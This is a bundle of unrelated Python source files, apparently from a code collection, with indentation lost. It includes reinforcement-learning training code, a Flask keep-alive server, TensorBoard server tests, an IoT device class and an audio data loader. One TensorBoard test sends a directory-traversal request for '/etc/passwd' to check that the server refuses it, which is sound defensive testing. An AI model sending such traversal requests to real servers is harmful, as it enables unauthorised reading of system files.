if j > MEMORY_SIZE : # learning
dqn.learn()
stp= j
if done:
break
observation = observation_
dqn.send_network()
lock.acquire()
tol_itr +=1
lock.release()
print('p%d %d( %d) total steps:%d reward:%f'%(pnum, i, tol_itr, stp, ep_r))
def a2dqn( steps, itr):
global N_WORKERS
N_WORKERS = multiprocessing.cpu_count()
sess = tf.Session()
#dqn_parent= dqn_method( build_dense_network, n_actions=env.action_space.n, n_features=env.observation_space.shape[0], layers=1, hiddens=20,
#memory_size=MEMORY_SIZE, replace_target_iter=300, e_greedy_increment=0.001)
e = gym.make('MountainCar-v0')
e = e.unwrapped
_, _, parent= build_dense_network( e.observation_space.shape[0], e.action_space.n , layers, hiddens, 'parent' )
env= []
dqn= []
for i in range(N_WORKERS):
e = gym.make('MountainCar-v0')
e = e.unwrapped
env.append( e)
d= dqn_method( sess, build_dense_network, n_actions=e.action_space.n, n_features=e.observation_space.shape[0], layers=layers, hiddens=hiddens,
memory_size=MEMORY_SIZE, e_greedy_increment=0.001)
dqn.append( d)
for i in range(N_WORKERS):
if i==0:
dqn[i].set_replacement( dqn[ N_WORKERS-1].n_params, 100, 200)
else:
dqn[i].set_replacement( dqn[ i-1].n_params, 100, 200)
COORD = tf.train.Coordinator()
sess.run(tf.global_variables_initializer())
worker_threads = []
for i in range(N_WORKERS):
t = threading.Thread(target=worker, args=( i, COORD, env[i], dqn[i], steps, itr ) )
t.start()
worker_threads.append(t)
COORD.join(worker_threads)
def dqn( steps, itr):
global N_WORKERS
N_WORKERS= 1
env= gym.make('MountainCar-v0')
env= env.unwrapped
sess = tf.Session()
dqn= dqn_method( sess, build_dense_network, n_actions=env.action_space.n, n_features=env.observation_space.shape[0], layers=layers, hiddens=hiddens,
memory_size=MEMORY_SIZE, e_greedy_increment=0.001)
dqn.set_replacement( None, 500, 501)
COORD = tf.train.Coordinator()
sess.run(tf.global_variables_initializer())
worker( 0, COORD, env, dqn, steps, itr)
# python3 dqn_mountaincar.py 3000 1000 dqn
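# python3 dqn_mountaincar.py 3000 1000 a2dqn   # parallel-worker variant (argv[3] selects the mode)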
if __name__ == "__main__":
argv=sys.argv
steps= int(argv[1])
itr= int(argv[2])
if argv[3]=='a2dqn':
a2dqn( steps, itr)
else:
dqn( steps, itr)
#if __name__ == "__main__":
#argv=sys.argv
#steps= int(argv[1])
#itr= int(argv[2])
#dqn= dqn_method( build_dense_network, n_actions=env.action_space.n, n_features=env.observation_space.shape[0], layers=1, hiddens=20,
#memory_size=MEMORY_SIZE, replace_target_iter=300, e_greedy_increment=0.001)
#for i in range(itr):
#observation = env.reset()
#ep_r= 0
#for j in range(steps):
#env.render()
#action= dqn.choose_action(observation)
#observation_, reward, done, info = env.step(action)
#dqn.store_transition(observation, action, reward, observation_)
#ep_r= 0.9*ep_r + 0.1*reward
#if j%100==0:
#print('%d, %5d Reward:%f'%(i, j, ep_r))
#if j > MEMORY_SIZE : # learning
#dqn.learn()
#if done:
#break
#observation = observation_
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "Your bot is alive!"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
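# Hypothetical usage from the bot's entry point (module name assumed):
#   from keep_alive import keep_alive
#   keep_alive()   # serves "/" on port 8080 in a background thread
#   # ...start the bot's blocking loop here...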
|
server_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for TensorBoard.
These tests start up a full-fledged TensorBoard server.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import base64
import gzip
import json
import numbers
import os
import shutil
import threading
import zlib
from six import BytesIO
from six.moves import http_client
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from google.protobuf import text_format
from tensorflow.contrib.tensorboard.plugins.projector.projector_config_pb2 import ProjectorConfig
from tensorflow.python.platform import resource_loader
from tensorflow.python.summary import event_multiplexer
from tensorflow.tensorboard.backend import server
from tensorflow.tensorboard.plugins import REGISTERED_PLUGINS
class TensorboardServerTest(tf.test.TestCase):
# Number of scalar-containing events to make.
_SCALAR_COUNT = 99
def setUp(self):
self._GenerateTestData()
self._multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=server.TENSORBOARD_SIZE_GUIDANCE)
server.ReloadMultiplexer(self._multiplexer, {self.get_temp_dir(): None})
# 0 to pick an unused port.
self._server = server.BuildServer(self._multiplexer, 'localhost', 0)
self._server_thread = threading.Thread(target=self._server.serve_forever)
self._server_thread.daemon = True
self._server_thread.start()
self._connection = http_client.HTTPConnection(
'localhost', self._server.server_address[1])
def tearDown(self):
self._connection.close()
self._server.shutdown()
self._server.server_close()
def _get(self, path, headers={}):
"""Perform a GET request for the given path."""
self._connection.request('GET', path, None, headers)
return self._connection.getresponse()
def _getJson(self, path):
"""Perform a GET request and decode the result as JSON."""
self._connection.request('GET', path)
response = self._connection.getresponse()
self.assertEqual(response.status, 200)
return json.loads(response.read().decode('utf-8'))
def testBasicStartup(self):
"""Start the server up and then shut it down immediately."""
pass
def testRequestMainPage(self):
"""Navigate to the main page and verify that it returns a 200."""
response = self._get('/')
self.assertEqual(response.status, 200)
def testRequestNonexistentPage(self):
"""Request a page that doesn't exist; it should 404."""
response = self._get('/asdf')
self.assertEqual(response.status, 404)
def testDirectoryTraversal(self):
"""Attempt a directory traversal attack."""
response = self._get('/..' * 30 + '/etc/passwd')
self.assertEqual(response.status, 404)
def testRuns(self):
"""Test the format of the /data/runs endpoint."""
run_json = self._getJson('/data/runs')
# Don't check the actual timestamp since it's time-dependent.
self.assertTrue(isinstance(run_json['run1']['firstEventTimestamp'],
numbers.Number))
del run_json['run1']['firstEventTimestamp']
self.assertEqual(run_json, {'run1': {'compressedHistograms': ['histogram'],
'scalars': ['simple_values'],
'histograms': ['histogram'],
'images': ['image'],
'audio': ['audio'],
'graph': True,
'run_metadata': ['test run']}})
def testHistograms(self):
"""Test the format of /data/histograms."""
self.assertEqual(
self._getJson('/data/histograms?tag=histogram&run=run1'),
[[0, 0, [0, 2.0, 3.0, 6.0, 5.0, [0.0, 1.0, 2.0], [1.0, 1.0, 1.0]]]])
def testSampleScalars(self):
"""Test the sample_count parameter of /data/scalars."""
for i in xrange(10, self._SCALAR_COUNT, 10):
samples = self._getJson('/data/scalars?sample_count=%d' % i)
values = samples['run1']['simple_values']
# Verify that we got the right amount of values and that we got the
# endpoints.
self.assertEqual(len(values), i)
self.assertEqual(values[0], [100, 10, 1])
self.assertEqual(values[-1], [9900, 990, 99])
def testSampleScalarsWithLargeSampleCount(self):
"""Test using a large sample_count."""
samples = self._getJson('/data/scalars?sample_count=999999')
values = samples['run1']['simple_values']
self.assertEqual(len(values), self._SCALAR_COUNT)
def testImages(self):
"""Test listing images and retrieving an individual image."""
image_json = self._getJson('/data/images?tag=image&run=run1')
image_query = image_json[0]['query']
# We don't care about the format of the image query.
del image_json[0]['query']
self.assertEqual(image_json, [{
'wall_time': 0,
'step': 0,
'height': 1,
'width': 1
}])
response = self._get('/data/individualImage?%s' % image_query)
self.assertEqual(response.status, 200)
def testAudio(self):
"""Test listing audio and retrieving an individual audio clip."""
audio_json = self._getJson('/data/audio?tag=audio&run=run1')
audio_query = audio_json[0]['query']
# We don't care about the format of the audio query.
del audio_json[0]['query']
self.assertEqual(audio_json, [{
'wall_time': 0,
'step': 0,
'content_type': 'audio/wav'
}])
response = self._get('/data/individualAudio?%s' % audio_query)
self.assertEqual(response.status, 200)
def testGraph(self):
"""Test retrieving the graph definition."""
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs')
self.assertEqual(response.status, 200)
graph_pbtxt = response.read()
# Parse the graph from pbtxt into a graph message.
graph = tf.GraphDef()
graph = text_format.Parse(graph_pbtxt, graph)
self.assertEqual(len(graph.node), 2)
self.assertEqual(graph.node[0].name, 'a')
self.assertEqual(graph.node[1].name, 'b')
# Make sure the second node has an attribute that was filtered out because
# it was too large and was added to the "too large" attributes list.
self.assertEqual(list(graph.node[1].attr.keys()), ['_very_large_attrs'])
self.assertEqual(graph.node[1].attr['_very_large_attrs'].list.s,
[b'very_large_attr'])
def testProjectorRunsWithEmbeddings(self):
"""Test the format of /runs endpoint in projector."""
if 'projector' not in REGISTERED_PLUGINS:
return
run_json = self._getJson('/data/plugin/projector/runs')
self.assertEqual(run_json, ['run1'])
def testProjectorInfo(self):
"""Test the format of /info endpoint in projector."""
if 'projector' not in REGISTERED_PLUGINS:
return
info_json = self._getJson('/data/plugin/projector/info?run=run1')
self.assertEqual(info_json['tensors'], {
'var1': {
'shape': [1, 2],
'name': 'var1',
'metadataFile': None
},
'var2': {
'shape': [10, 10],
'name': 'var2',
'metadataFile': None
},
'var3': {
'shape': [100, 100],
'name': 'var3',
'metadataFile': None
}
})
def testProjectorTensor(self):
"""Test the format of /tensor endpoint in projector."""
if 'projector' not in REGISTERED_PLUGINS:
return
tensor_tsv = (self._get('/data/plugin/projector/tensor?run=run1&name=var1')
.read())
self.assertEqual(tensor_tsv, b'6.0\t6.0')
def testAcceptGzip_compressesResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': 'gzip'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
graph = text_format.Parse(pbtxt, tf.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptAnyEncoding_compressesResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': '*'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
graph = text_format.Parse(pbtxt, tf.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptDoodleEncoding_doesNotCompressResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': 'doodle'})
self.assertEqual(response.status, 200)
self.assertIsNone(response.getheader('Content-Encoding'))
graph = text_format.Parse(response.read(), tf.GraphDef())
self.assertEqual(len(graph.node), 2)
def testRunMetadata(self):
"""Test retrieving the run metadata information."""
response = self._get('/data/run_metadata?run=run1&tag=test%20run')
self.assertEqual(response.status, 200)
run_metadata_pbtxt = response.read()
# Parse from pbtxt into a message.
run_metadata = tf.RunMetadata()
text_format.Parse(run_metadata_pbtxt, run_metadata)
self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
self.assertEqual(run_metadata.step_stats.dev_stats[0].device, 'test device')
def _GenerateTestData(self):
"""Generates the test data directory.
The test data has a single run named run1 which contains:
- a histogram
- an image at timestamp and step 0
- scalar events containing the value i at step 10 * i and wall time
100 * i, for i in [1, _SCALAR_COUNT).
- a graph definition
"""
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
run1_path = os.path.join(temp_dir, 'run1')
os.makedirs(run1_path)
writer = tf.train.SummaryWriter(run1_path)
histogram_value = tf.HistogramProto(min=0,
max=2,
num=3,
sum=6,
sum_squares=5,
bucket_limit=[0, 1, 2],
bucket=[1, 1, 1])
# Add a simple graph event.
graph_def = tf.GraphDef()
node1 = graph_def.node.add()
node1.name = 'a'
node2 = graph_def.node.add()
node2.name = 'b'
node2.attr['very_large_attr'].s = b'a' * 2048 # 2 KB attribute
writer.add_graph(graph_def)
# Add a simple run metadata event.
run_metadata = tf.RunMetadata()
device_stats = run_metadata.step_stats.dev_stats.add()
device_stats.device = 'test device'
writer.add_run_metadata(run_metadata, 'test run')
# 1x1 transparent GIF.
encoded_image = base64.b64decode(
'R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7')
image_value = tf.Summary.Image(height=1,
width=1,
colorspace=1,
encoded_image_string=encoded_image)
audio_value = tf.Summary.Audio(sample_rate=44100,
length_frames=22050,
num_channels=2,
encoded_audio_string=b'',
content_type='audio/wav')
writer.add_event(tf.Event(wall_time=0,
step=0,
summary=tf.Summary(value=[
tf.Summary.Value(tag='histogram',
histo=histogram_value),
tf.Summary.Value(tag='image',
image=image_value),
tf.Summary.Value(tag='audio',
audio=audio_value)
])))
    # Write _SCALAR_COUNT simple values.
for i in xrange(1, self._SCALAR_COUNT + 1):
writer.add_event(tf.Event(
# We use different values for wall time, step, and the value so we can
# tell them apart.
wall_time=100 * i,
step=10 * i,
summary=tf.Summary(value=[tf.Summary.Value(tag='simple_values',
simple_value=i)])))
writer.flush()
writer.close()
if 'projector' in REGISTERED_PLUGINS:
self._GenerateProjectorTestData(run1_path)
def _GenerateProjectorTestData(self, run_path):
# Write a projector config file in run1.
config_path = os.path.join(run_path, 'projector_config.pbtxt')
config = ProjectorConfig()
config_pbtxt = text_format.MessageToString(config)
with tf.gfile.GFile(config_path, 'w') as f:
f.write(config_pbtxt)
# Write a checkpoint with some dummy variables.
with tf.Graph().as_default():
sess = tf.Session()
checkpoint_path = os.path.join(run_path, 'model')
tf.get_variable(
'var1', [1, 2], initializer=tf.constant_initializer(6.0))
tf.get_variable('var2', [10, 10])
tf.get_variable('var3', [100, 100])
sess.run(tf.initialize_all_variables())
saver = tf.train.Saver()
saver.save(sess, checkpoint_path)
class ParseEventFilesSpecTest(tf.test.TestCase):
def testRunName(self):
logdir_string = 'lol:/cat'
expected = {'/cat': 'lol'}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testPathWithColonThatComesAfterASlash_isNotConsideredARunName(self):
logdir_string = '/lol:/cat'
expected = {'/lol:/cat': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testMultipleDirectories(self):
logdir_string = '/a,/b'
expected = {'/a': None, '/b': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testNormalizesPaths(self):
logdir_string = '/lol/.//cat/../cat'
expected = {'/lol/cat': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testAbsolutifies(self):
logdir_string = 'lol/cat'
expected = {os.path.realpath('lol/cat'): None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testRespectsGCSPath(self):
logdir_string = 'gs://foo/path'
expected = {'gs://foo/path': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testDoesNotExpandUserInGCSPath(self):
logdir_string = 'gs://~/foo/path'
expected = {'gs://~/foo/path': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testDoesNotNormalizeGCSPath(self):
logdir_string = 'gs://foo/./path//..'
expected = {'gs://foo/./path//..': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
class TensorBoardAssetsTest(tf.test.TestCase):
def testTagFound(self):
tag = resource_loader.load_resource('tensorboard/TAG')
self.assertTrue(tag)
if __name__ == '__main__':
tf.test.main()
|
mate.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 JiNong, Inc.
# All right reserved.
#
"""
Defines the base Mate.
"""
import time
import util
import logging
import logging.handlers
import traceback
from calibration import Calibrator
from threading import Thread
from mblock import MBlock, BlkType
from enum import Enum
from devtype import DevType
from datetime import datetime
from dinfo import DevInfo
class Mate(object):
"""
    Defines the basic form of a Mate.
"""
def __init__(self, option, devinfo, coupleid, logger=None):
"""
        Constructor for Mate. Takes option and devinfo as its main inputs.
        :param option: a dictionary of settings that control operation
        :param devinfo: a dictionary-style description of the devices to handle, in the following format.
         id is the device id, dk is the key used to identify the device, dt is the device type, and children lists sub-devices when the device has any.
devinfo : [
{"id" : "3", "dk" : "1", "dt": "nd", "children" : [
{"id" : "4", "dk" : "0", "dt": "sen"},
{"id" : "5", "dk" : "1", "dt": "sen"},
{"id" : "6", "dk" : "2", "dt": "act"},
{"id" : "7", "dk" : "3", "dt": "act/retractable/level0"}
]}
]
        :param coupleid: the couple id.
        :param logger: a logger for logging. If None, one is created internally.
"""
self._option = option
print "mate initialized. ", option
self._coupleid = coupleid
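        # "time": seconds slept per loop iteration; "obs" / "noti": send
        # observations / notifications once every that many iterations (see run()).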
self._sleep = {"time": 3, "obs": 19, "noti": 19} if "sleep" not in option else option["sleep"]
self._devinfo = DevInfo(devinfo)
self._writecb = None
self._executing = False
self._connected = False
self._msgq = None
if "backup" in option and "prefix" in option["backup"]:
self._backup = True
else:
self._backup = False
if logger is None:
self._logger = util.getdefaultlogger()
else:
self._logger = logger
self._calibrator = Calibrator(option, self._logger)
def __repr__(self):
return "{}({},{})".format(self.__class__.__name__, str(self._option), str(self._devinfo))
def start(self, _writecb):
""" Mate가 시작할때 호출됨 """
self._executing = True
self._writecb = _writecb
return True
def stop(self):
""" Mate가 중지될때 호출됨 """
self._executing = False
return True
def connect(self):
self._connected = True
return True
def close(self):
self._connected = False
def getvalue(self, k, v):
"""
        Used to compute a sensor value.
        Uses the Calibrator; if no calibration is configured, the raw value is returned.
"""
return self._calibrator.calculate(k, v)
def isexecuting(self):
""" Mate가 작동중인지를 확인함 """
return self._executing
def isconnected(self):
""" Mate가 연결되어 있는지를 확인함 """
return self._connected
def writeblk(self, blk):
""" 외부에서 데이터 전달을 위해 호출되는 메소드. """
# external callback
print "###message : ", blk.get()
def readmsg(self):
""" Mate가 메세지를 읽는 함수. 직접구현해야함. """
self._msgq = [MBlock(0, BlkType.NONE, None)]
def backup(self, blk):
fname = "backup/" + self._option["backup"]["prefix"] + "-" + datetime.now().strftime("%Y%d%m") + ".bak"
with open(fname, "a") as fp:
fp.write(blk.stringify() + "\n")
def writecb(self, blk):
self._writecb(blk)
# backup
if self._backup:
self.backup(blk)
def sendobs(self):
""" 관측치를 전송한다. writecb를 사용함. """
pass
def sendnoti(self):
""" 노티를 전송한다. writecb를 사용함. """
pass
def doextra(self):
print("doextra-Mate", type(self).__name__)
pass
def run(self):
print ("mate run ... sleep : ", self._sleep["time"])
scnt = 0
while self.isexecuting():
try:
while self.isexecuting() == True and self.isconnected() == False:
if self.connect() == False:
self._logger.info("sleep 10 seconds and try to connect")
time.sleep(10)
else:
self._logger.info("reconnected!!")
if self.isexecuting() == False:
self._logger.info("finish to execute!!")
break
time.sleep(self._sleep["time"])
self.readmsg()
self.doextra()
if scnt % self._sleep["obs"] == 0:
self.sendobs()
if scnt % self._sleep["noti"] == 0:
self.sendnoti()
scnt = scnt + 1
except Exception as ex:
self._logger.warn("There is an exception : " + str(ex))
self._logger.warn(str(traceback.format_exc()))
try:
self.close()
except:
pass
print ("mate stop")
class ThreadMate(Mate):
def __init__(self, option, devinfo, coupleid, logger=None):
super(ThreadMate, self).__init__(option, devinfo, coupleid, logger)
self._logger.info("Mate Started.")
def start(self, _writecb):
"""
        Called when the Mate starts.
        :param _writecb: callback method of another mate
"""
super(ThreadMate, self).start(_writecb)
self._thd = Thread(target=self.run)
self._thd.start()
return True
def stop(self):
""" Mate가 중지될때 호출됨 """
super(ThreadMate, self).stop()
self._thd.join()
return True
if __name__ == "__main__":
mate = ThreadMate({}, [], '1', None)
mate2 = Mate({}, [], '1', None)
mate.start(mate2.writeblk)
print ("mate started")
time.sleep(3)
mate.stop()
print ("mate stopped")
|
audio_reader.py
|
import fnmatch
import os
import random
import re
import threading
import json
import librosa
import numpy as np
import tensorflow as tf
from .ops import upsample_labels
FILE_PATTERN = r'p([0-9]+)_([0-9]+)\.wav'
def get_category_cardinality(files):
id_reg_expression = re.compile(FILE_PATTERN)
min_id = None
max_id = None
for filename in files:
matches = id_reg_expression.findall(filename)[0]
id, recording_id = [int(id_) for id_ in matches]
if min_id is None or id < min_id:
min_id = id
if max_id is None or id > max_id:
max_id = id
return min_id, max_id
def randomize_files(files):
for file in files:
file_index = random.randint(0, (len(files) - 1))
yield files[file_index]
def find_files(directory, pattern='*.wav'):
'''Recursively finds all files matching the pattern.'''
files = []
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, pattern):
files.append(os.path.join(root, filename))
return files
def load_generic_audio(directory, sample_rate):
'''Generator that yields audio waveforms from the directory.'''
files = find_files(directory)
label_files = find_files(directory, "*.json")
id_reg_exp = re.compile(FILE_PATTERN)
print("files length: {}".format(len(files)))
randomized_files = randomize_files(files)
for filename in randomized_files:
ids = id_reg_exp.findall(filename)
if not ids:
# The file name does not match the pattern containing ids, so
# there is no id.
category_id = None
else:
# The file name matches the pattern for containing ids.
category_id = int(ids[0][0])
if label_files:
with open("./%s.json" % ''.join(filename.split('.')[:-1]), 'r') as f:
labels = json.loads(f.read())
else:
labels = None
audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
audio = audio.reshape(-1, 1)
yield audio, filename, category_id, labels
def trim_silence(audio, threshold):
'''Removes silence at the beginning and end of a sample.'''
energy = librosa.feature.rmse(audio)
frames = np.nonzero(energy > threshold)
indices = librosa.core.frames_to_samples(frames)[1]
# Note: indices can be an empty array, if the whole audio was silence.
return audio[indices[0]:indices[-1]] if indices.size else audio[0:0]
def not_all_have_id(files):
''' Return true iff any of the filenames does not conform to the pattern
we require for determining the category id.'''
id_reg_exp = re.compile(FILE_PATTERN)
for file in files:
ids = id_reg_exp.findall(file)
if not ids:
return True
return False
def not_all_have_label_file(wavs, labels):
    if [w.split(".")[:-1] for w in wavs] != [l.split(".")[:-1] for l in labels]:
        return True
    return False
class AudioReader(object):
'''Generic background audio reader that preprocesses audio files
and enqueues them into a TensorFlow queue.'''
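    # Hypothetical usage sketch (the directory name and receptive-field value
    # below are assumptions, not part of this file):
    #   coord = tf.train.Coordinator()
    #   reader = AudioReader('corpus', coord, sample_rate=16000, gc_enabled=False,
    #                        lc_channels=None, receptive_field=5117)
    #   audio_batch = reader.dequeue(1)
    #   with tf.Session() as sess:
    #       reader.start_threads(sess)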
def __init__(self,
audio_dir,
coord,
sample_rate,
gc_enabled,
lc_channels,
receptive_field,
sample_size=None,
silence_threshold=None,
queue_size=32):
self.audio_dir = audio_dir
self.sample_rate = sample_rate
self.coord = coord
self.sample_size = sample_size
self.receptive_field = receptive_field
self.silence_threshold = silence_threshold
self.gc_enabled = gc_enabled
self.lc_channels = lc_channels
self.threads = []
self.sample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
self.queue = tf.PaddingFIFOQueue(queue_size,
['float32'],
shapes=[(None, 1)])
self.enqueue = self.queue.enqueue([self.sample_placeholder])
if self.gc_enabled:
self.id_placeholder = tf.placeholder(dtype=tf.int32, shape=())
self.gc_queue = tf.PaddingFIFOQueue(queue_size, ['int32'],
shapes=[()])
self.gc_enqueue = self.gc_queue.enqueue([self.id_placeholder])
if self.lc_channels:
self.lc_placeholder = tf.placeholder(dtype=tf.float32, shape=(None, self.lc_channels))
self.lc_queue = tf.PaddingFIFOQueue(queue_size, ['float32'],
shapes=[(None, self.lc_channels)])
self.lc_enqueue = self.lc_queue.enqueue([self.lc_placeholder])
# TODO Find a better way to check this.
# Checking inside the AudioReader's thread makes it hard to terminate
# the execution of the script, so we do it in the constructor for now.
files = find_files(audio_dir)
if not files:
raise ValueError("No audio files found in '{}'.".format(audio_dir))
if self.gc_enabled and not_all_have_id(files):
raise ValueError("Global conditioning is enabled, but file names "
"do not conform to pattern having id.")
if self.lc_channels:
label_files = find_files(audio_dir, "*.json")
self.lc_label_files = label_files
if not_all_have_label_file(files, label_files):
raise ValueError("Local conditioning is enabled but wav files do not have "
"do not have corresponding JSON label files.")
# Determine the number of mutually-exclusive categories we will
        # accommodate in our embedding table.
if self.gc_enabled:
_, self.gc_category_cardinality = get_category_cardinality(files)
# Add one to the largest index to get the number of categories,
# since tf.nn.embedding_lookup expects zero-indexing. This
# means one or more at the bottom correspond to unused entries
# in the embedding lookup table. But that's a small waste of memory
            # to keep the code simpler, and preserves correspondence between
# the id one specifies when generating, and the ids in the
# file names.
self.gc_category_cardinality += 1
print("Detected --gc_cardinality={}".format(
self.gc_category_cardinality))
else:
self.gc_category_cardinality = None
def dequeue(self, num_elements):
output = self.queue.dequeue_many(num_elements)
return output
def dequeue_gc(self, num_elements):
return self.gc_queue.dequeue_many(num_elements)
def dequeue_lc(self, num_elements):
return self.lc_queue.dequeue_many(num_elements)
def thread_main(self, sess):
stop = False
# Go through the dataset multiple times
while not stop:
iterator = load_generic_audio(self.audio_dir, self.sample_rate)
for audio, filename, category_id, labels in iterator:
if self.coord.should_stop():
stop = True
break
if self.silence_threshold is not None:
# Remove silence
audio = trim_silence(audio[:, 0], self.silence_threshold)
audio = audio.reshape(-1, 1)
if audio.size == 0:
print("Warning: {} was ignored as it contains only "
"silence. Consider decreasing trim_silence "
"threshold, or adjust volume of the audio."
.format(filename))
original_audio_size = len(audio)
audio = np.pad(audio, [[self.receptive_field, 0], [0, 0]],
'constant')
if self.lc_channels:
upsampled_labels = upsample_labels(labels, original_audio_size)
upsampled_labels = np.pad(upsampled_labels, [[self.receptive_field, 0], [0, 0]], 'edge')
if self.sample_size:
# Cut samples into pieces of size receptive_field +
# sample_size with receptive_field overlap
while len(audio) > self.receptive_field:
piece = audio[:(self.receptive_field +
self.sample_size), :]
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: piece})
audio = audio[self.sample_size:, :]
if self.gc_enabled:
sess.run(self.gc_enqueue, feed_dict={
self.id_placeholder: category_id})
if self.lc_channels:
label_slice = upsampled_labels[:(self.receptive_field +
self.sample_size), :]
upsampled_labels = upsampled_labels[self.sample_size:, :]
sess.run(self.lc_enqueue, feed_dict={self.lc_placeholder: label_slice})
else:
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: audio})
if self.gc_enabled:
sess.run(self.gc_enqueue,
feed_dict={self.id_placeholder: category_id})
if self.lc_channels:
sess.run(self.lc_enqueue, feed_dict={self.lc_placeholder: upsampled_labels})
def start_threads(self, sess, n_threads=1):
for _ in range(n_threads):
thread = threading.Thread(target=self.thread_main, args=(sess,))
thread.daemon = True # Thread will close when parent quits.
thread.start()
self.threads.append(thread)
return self.threads
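

# --- Usage sketch (not part of the original module) ---
# A minimal, hypothetical example of wiring the AudioReader into a TF 1.x
# session. The corpus directory and the numeric parameters below are
# placeholder values, not settings taken from the original project.
if __name__ == '__main__':
    coord = tf.train.Coordinator()
    reader = AudioReader(audio_dir='corpus',
                         coord=coord,
                         sample_rate=16000,
                         gc_enabled=False,
                         lc_channels=None,
                         receptive_field=5117,
                         sample_size=100000,
                         silence_threshold=0.3)
    audio_batch = reader.dequeue(num_elements=1)
    with tf.Session() as sess:
        reader.start_threads(sess)
        batch = sess.run(audio_batch)       # blocks until a piece is enqueued
        print("dequeued batch shape:", batch.shape)
        coord.request_stop()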
|
base.py
|
#!/usr/bin/env python
"""
fs.base
=======
This module defines the most basic filesystem abstraction, the FS class.
Instances of FS represent a filesystem containing files and directories
that can be queried and manipulated. To implement a new kind of filesystem,
start by subclassing the base FS class.
For more information regarding implementing a working PyFilesystem interface, see :ref:`implementers`.
"""
__all__ = ['DummyLock',
'silence_fserrors',
'NullFile',
'synchronize',
'FS',
'flags_to_mode',
'NoDefaultMeta']
import os
import os.path
import shutil
import fnmatch
import re
import datetime
import time
try:
import threading
except ImportError:
import dummy_threading as threading
from fs.path import *
from fs.errors import *
from fs.local_functools import wraps
class DummyLock(object):
"""A dummy lock object that doesn't do anything.
This is used as a placeholder when locking is disabled. We can't
directly use the Lock class from the dummy_threading module, since
it attempts to sanity-check the sequence of acquire/release calls
in a way that breaks when real threading is available.
"""
def acquire(self, blocking=1):
"""Acquiring a DummyLock always succeeds."""
return 1
def release(self):
"""Releasing a DummyLock always succeeds."""
pass
def __enter__(self):
pass
def __exit__(self, *args):
pass
def silence_fserrors(f, *args, **kwargs):
"""Perform a function call and return ``None`` if an :class:`fs.errors.FSError` is thrown
:param f: Function to call
:param args: Parameters to f
:param kwargs: Keyword parameters to f
"""
try:
return f(*args, **kwargs)
except FSError:
return None
class NoDefaultMeta(object):
"""A singleton used to signify that there is no default for getmeta"""
pass
class NullFile(object):
"""A NullFile is a file object that has no functionality.
Null files are returned by the :meth:`fs.base.FS.safeopen` method in FS objects when the
file doesn't exist. This can simplify code by negating the need to check
if a file exists, or handling exceptions.
"""
def __init__(self):
self.closed = False
def __iter__(self):
return self
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.closed = True
def flush(self):
pass
def next(self):
raise StopIteration
def readline(self, *args, **kwargs):
return ""
def close(self):
self.closed = True
def read(self, size=None):
return ""
def seek(self, *args, **kwargs):
pass
def tell(self):
return 0
def truncate(self, *args, **kwargs):
return 0
def write(self, data):
pass
def writelines(self, *args, **kwargs):
pass
def synchronize(func):
"""Decorator to synchronize a method on self._lock."""
@wraps(func)
def acquire_lock(self, *args, **kwargs):
self._lock.acquire()
try:
return func(self, *args, **kwargs)
finally:
self._lock.release()
return acquire_lock
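
# --- Usage sketch (not part of the original module) ---
# A hypothetical illustration of the synchronize decorator: any object that
# exposes a self._lock attribute can mark methods as mutually exclusive.
class _SynchronizedCounter(object):
    def __init__(self):
        self._lock = threading.RLock()
        self._value = 0

    @synchronize
    def increment(self):
        # The decorator acquires self._lock before this body runs and
        # releases it afterwards, even if an exception is raised.
        self._value += 1
        return self._value
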
class FS(object):
"""The base class for Filesystem abstraction objects.
An instance of a class derived from FS is an abstraction on some kind of filesystem, such as the OS filesystem or a zip file.
"""
_meta = {}
